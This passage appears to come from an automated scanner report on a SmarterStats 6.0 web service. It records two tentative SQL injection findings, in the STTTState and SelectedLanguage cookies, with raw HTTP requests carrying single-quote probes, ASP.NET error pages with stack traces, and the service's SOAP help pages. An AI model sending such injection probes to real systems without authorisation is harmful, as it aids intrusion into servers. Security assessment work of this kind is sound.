&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetRequestedSettings xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;keys&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;/keys&gt;
&lt;/GetRequestedSettings&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetRequestedSettingsResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetRequestedSettingsResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GetRequestedSettingsResult&gt;
&lt;values&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;string&gt;<font class=value>string</font>&lt;/string&gt;
&lt;/values&gt;
&lt;/GetRequestedSettingsResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>





</span>









</body>
</html>

2.13. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STTTState cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STTTState cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the STTTState cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Services/SiteAdmin.asmx?op=AddSite2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState='; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=AddSite2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=''; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 19972
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>AddSite2</h2>
<p class="intro">Adds a site to the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/AddSite2' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soUserName:</td>
<td><input class="frmInput" type="text" size="50" name="soUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soPassword:</td>
<td><input class="frmInput" type="text" size="50" name="soPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soFirstName:</td>
<td><input class="frmInput" type="text" size="50" name="soFirstName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soLastName:</td>
<td><input class="frmInput" type="text" size="50" name="soLastName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ServerID:</td>
<td><input class="frmInput" type="text" size="50" name="ServerID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DomainName:</td>
<td><input class="frmInput" type="text" size="50" name="DomainName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="LogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogFormat:</td>
<td><input class="frmInput" type="text" size="50" name="LogFormat"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogWildcard:</td>
<td><input class="frmInput" type="text" size="50" name="LogWildcard"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDaysBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="LogDaysBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogMonthsBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogMonthsBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPath:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPathURL:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPathURL"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">TimeZoneIndex:</td>
<td><input class="frmInput" type="text" size="50" name="TimeZoneIndex"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/AddSite2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSite2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;/AddSite2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSite2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSite2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSite2Result&gt;
&lt;/AddSite2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSite2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;/AddSite2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSite2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSite2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSite2Result&gt;
&lt;/AddSite2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/AddSite2?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogDirectory</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/AddSite2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogDirectory</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

2.14. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [SelectedLanguage cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The SelectedLanguage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SelectedLanguage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Services/SiteAdmin.asmx?op=GetAllSites2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage='; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:21 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

